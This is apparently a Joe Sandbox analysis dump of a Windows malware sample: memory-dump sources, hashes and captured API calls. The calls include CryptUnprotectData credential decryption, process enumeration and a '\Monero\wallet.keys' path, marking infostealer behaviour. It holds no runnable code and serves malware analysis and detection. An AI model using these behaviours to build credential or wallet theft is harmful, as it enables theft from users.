                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 36564fc745d6e61cf70566970d55c48b75187dbf961e766e4ded1127bcff4d81
                          • Instruction ID: b6aeec38fb58acfcc2f3af2631a142c554f748e0a99eb00e61f83728eb6cd1ac
                          • Opcode Fuzzy Hash: 36564fc745d6e61cf70566970d55c48b75187dbf961e766e4ded1127bcff4d81
                          • Instruction Fuzzy Hash: 23120C7191011C9BDB14FB61DC9AFED7338AF94304F4041ADE50AA6191EE346F4ADFA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %-q$4{}$]\7s$r1?-$v`}d$;1
                          • API String ID: 0-3145308216
                          • Opcode ID: afcaf484e71255cd8ea1f78bb3e02f1cf46249ba2d6e2bf430e1f76e352d3461
                          • Instruction ID: 9c20341f7a4e442cb93df5143b98e20954d545bf80e11b337646e573d2e7529a
                          • Opcode Fuzzy Hash: afcaf484e71255cd8ea1f78bb3e02f1cf46249ba2d6e2bf430e1f76e352d3461
                          • Instruction Fuzzy Hash: 5DB209F360C2009FE3086E2DEC9577ABBE5EBD4320F1A463DEAC5C7744E93558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &#g$,ww$B_$]~!$u)DK$y\]v
                          • API String ID: 0-472964207
                          • Opcode ID: dd90b6177c85ee9477f05eb86428375a6c371f77f161138534ab200149a57d8b
                          • Instruction ID: 717007ecc6047f894622dfa7f4f4e202fa3754aa5b04c8d2bed70706b48b7225
                          • Opcode Fuzzy Hash: dd90b6177c85ee9477f05eb86428375a6c371f77f161138534ab200149a57d8b
                          • Instruction Fuzzy Hash: A8A2E4F350C204AFE304AF29EC8566ABBE5EF94320F16893DE6C4C3744E63598558B97
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Ar^]$DT~$I6pr$u_o$wz
                          • API String ID: 0-414213122
                          • Opcode ID: b9b8d0faf4fb03475ea4cc75882ef050ff19e0792ccc057fd142ad1c0041a72d
                          • Instruction ID: b0a787fcd4e2c34c9868535774c049296941c809ae09f068ba6d91f9d23da957
                          • Opcode Fuzzy Hash: b9b8d0faf4fb03475ea4cc75882ef050ff19e0792ccc057fd142ad1c0041a72d
                          • Instruction Fuzzy Hash: 7AB228F3A0C2049FE704AE2DEC8567ABBE9EFD4320F1A453DEAC4C7744E63558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: [+|$[>3$\46w$gvT$5>
                          • API String ID: 0-3837273054
                          • Opcode ID: d6e80825482e31148da9ff8773bfb7b822dd425194b5cd9228f9aaf87497aea9
                          • Instruction ID: 8eae7691d2f33825aded32b553790e38c78f6c12c13b85d7ae082bae81f23f7e
                          • Opcode Fuzzy Hash: d6e80825482e31148da9ff8773bfb7b822dd425194b5cd9228f9aaf87497aea9
                          • Instruction Fuzzy Hash: 5CA2E4F360C200AFE7046E2DEC8567AFBE9EF94620F1A493DE6C5C3344E63598158697
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CBC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CBC87C
                          • lstrcat.KERNEL32(?,00CD0B46), ref: 00CBC943
                          • lstrcat.KERNEL32(?,00CD0B47), ref: 00CBC957
                          • lstrcat.KERNEL32(?,00CD0B4E), ref: 00CBC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: f3c201fbaeffce78ba1b08aac37c6c5ed064e965b2f6bd50879349686eda100d
                          • Instruction ID: 4ebd81cc1585916d1bdb48c1e7be763477e4959fc7e426b8d4ccedec6eaf699b
                          • Opcode Fuzzy Hash: f3c201fbaeffce78ba1b08aac37c6c5ed064e965b2f6bd50879349686eda100d
                          • Instruction Fuzzy Hash: C1416EB4D0421ADFDB10DF94DC89BFEB7B8AB88304F1441B9E509A6280D7745B84CF92
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00CB724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00CB7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00CB72A4
                          • LocalFree.KERNEL32(?), ref: 00CB72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: ffa812b27a2809c91ae4579033b509ac87451fde874f35e062e934f30d832b40
                          • Instruction ID: 4f12fb486a61f2518cf415d36daf7f6a23bae60ea429c1c0375cf854396fdad6
                          • Opcode Fuzzy Hash: ffa812b27a2809c91ae4579033b509ac87451fde874f35e062e934f30d832b40
                          • Instruction Fuzzy Hash: 440100B5A40208BFDB14DBE5DD49FAD7778AB84704F144155FB09BB2C0D6B0AA04CB65
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CC961E
                          • Process32First.KERNEL32(00CD0ACA,00000128), ref: 00CC9632
                          • Process32Next.KERNEL32(00CD0ACA,00000128), ref: 00CC9647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00CC965C
                          • CloseHandle.KERNEL32(00CD0ACA), ref: 00CC967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Jrw$Z^?$|*<[$ys
                          • API String ID: 0-3302216416
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CD05B7), ref: 00CC86CA
                          • Process32First.KERNEL32(?,00000128), ref: 00CC86DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00CC86F3
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • CloseHandle.KERNEL32(?), ref: 00CC8761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00CB5184,40000001,00000000,00000000,?,00CB5184), ref: 00CC8EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CD0E00,00000000,?), ref: 00CC79B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC79B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00CD0E00,00000000,?), ref: 00CC79C4
                          • wsprintfA.USER32 ref: 00CC79F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0189E258,00000000,?,00CD0E10,00000000,?,00000000,00000000), ref: 00CC7A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC7A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0189E258,00000000,?,00CD0E10,00000000,?,00000000,00000000,?), ref: 00CC7A7D
                          • wsprintfA.USER32 ref: 00CC7AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          APIs
                          • CoCreateInstance.COMBASE(00CCE118,00000000,00000001,00CCE108,00000000), ref: 00CC3758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00CC37B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CB9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00CB9BA3
                          • LocalFree.KERNEL32(?), ref: 00CB9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4\W$C7|
                          • API String ID: 0-3325730710
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #T?$RB^
                          • API String ID: 0-3580500507
                          • Opcode ID: 5287e3f1276909bb938eeb4751d0fd5e13f29525fd0dc8ff4c648d3647a42251
                          • Instruction ID: e83e9b9d56effe62eaaaf9cf12515236b6c9982970628c3e9fa772e68327c4fe
                          • Opcode Fuzzy Hash: 5287e3f1276909bb938eeb4751d0fd5e13f29525fd0dc8ff4c648d3647a42251
                          • Instruction Fuzzy Hash: D861CEB39083109FE3047F29DC8537AB7E5EF94720F1A492DDAC893384EA7958458B87
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: BW/v
                          • API String ID: 0-3536886779
                          • Opcode ID: d198f04e45285a41de75e1ae085caeedf5316a49cb410cf46ee477ef7826d91d
                          • Instruction ID: 1f6b201e2c35922f28636dd8284e7a56ca70658bcb5f6f17bf3553f131d215f1
                          • Opcode Fuzzy Hash: d198f04e45285a41de75e1ae085caeedf5316a49cb410cf46ee477ef7826d91d
                          • Instruction Fuzzy Hash: C06127F3A082044FE3046E7DEC8977ABBD5DF98320F1A493DEAC487744E97958098686
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >">
                          • API String ID: 0-3836190215
                          • Opcode ID: b554c99200a5274a98a2fb3807e84d9b6d012d60a04153861a3006f58e554810
                          • Instruction ID: 7b3ddcde67dbbe9a9e89e02b408c8e882cfe4582a9ef03ebe27cec3f7c4d8d35
                          • Opcode Fuzzy Hash: b554c99200a5274a98a2fb3807e84d9b6d012d60a04153861a3006f58e554810
                          • Instruction Fuzzy Hash: E35169F3A186145BE70CAE2CEC5677A76D6DBD4311F2A813DEB85C3384E9794C0182D6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: [e6m
                          • API String ID: 0-3377189604
                          • Opcode ID: 123d4d3599aa26198e37fcb3f94747b5c52fe30a8696c0d29dae8da545453045
                          • Instruction ID: ccc660e62b897021a08fe43ab7cbf1aeb03f1bd8ac352756e6d10c75d1d58b66
                          • Opcode Fuzzy Hash: 123d4d3599aa26198e37fcb3f94747b5c52fe30a8696c0d29dae8da545453045
                          • Instruction Fuzzy Hash: 945107B350C3089FE3586E29DC5963BF7E8EB90310F16892DEBD683384FA7158168653
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: vmW?
                          • API String ID: 0-1820565121
                          • Opcode ID: 5c9ef784f9e3060e990505f17e4e895d32a5f993ebaf7b2e8e7e6c85014c0534
                          • Instruction ID: 010cac5cbb11b2fb3221c18601a306456b7a884ee4a85c5c6715b56bb006243d
                          • Opcode Fuzzy Hash: 5c9ef784f9e3060e990505f17e4e895d32a5f993ebaf7b2e8e7e6c85014c0534
                          • Instruction Fuzzy Hash: 775197B251DA14DBD30C6E28D84563DB7F5EB98310F17482EDAD247B44EB7058808B97
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c2d5d78994ee90e444df99518a0b54a1d908116b625b95cf04cf6ec00ff1ee6
                          • Instruction ID: 0d06083c4b81b7816295df46514e766bfa924b27c9c7bc9146fc206459fd214d
                          • Opcode Fuzzy Hash: 3c2d5d78994ee90e444df99518a0b54a1d908116b625b95cf04cf6ec00ff1ee6
                          • Instruction Fuzzy Hash: AA316EF2A0C6049FE315AE1ADCC57BAF7E6EB98310F0A892DD6C987740E63554148A86
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
